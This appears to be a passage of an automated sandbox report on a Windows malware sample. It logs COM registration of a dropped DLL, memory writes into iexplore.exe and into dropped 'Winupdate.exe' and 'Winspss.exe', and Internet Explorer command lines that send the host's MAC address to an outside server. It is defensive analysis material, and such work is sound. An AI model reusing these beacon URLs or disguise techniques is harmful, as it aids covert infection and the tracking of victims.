Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib\ = "{5399FC70-D920-4d82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\ = "s 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID\ = "new.myb" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ = "C:\\Windows\\SysWow64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 988 wrote to memory of 684 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 684 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 684 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1060 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1060 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1060 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1060 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 1060 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 1060 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winupdate.exe
PID 1060 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 1060 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 1060 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe C:\WINDOWS\SysWOW64\4875\Winspss.exe
PID 228 wrote to memory of 1468 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 228 wrote to memory of 1468 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 988 wrote to memory of 2360 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 2360 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 988 wrote to memory of 2360 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_cnt.php?mac=62-87-14-87-72-27&key=kmj&pid=rain

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:17410 /prefetch:2

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s psjm.dll

C:\WINDOWS\SysWOW64\4875\Winupdate.exe

Winupdate.exe

C:\WINDOWS\SysWOW64\4875\Winspss.exe

Winspss.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_pro.php?mac=62-87-14-87-72-27&key=kmj

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:82946 /prefetch:2

Network


Files

C:\Windows\SysWOW64\psjm.dll


C:\Windows\SysWOW64\4875\Winupdate.exe


C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verBC4B.tmp


C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HT2TD2G4\suggestions[1].en-US
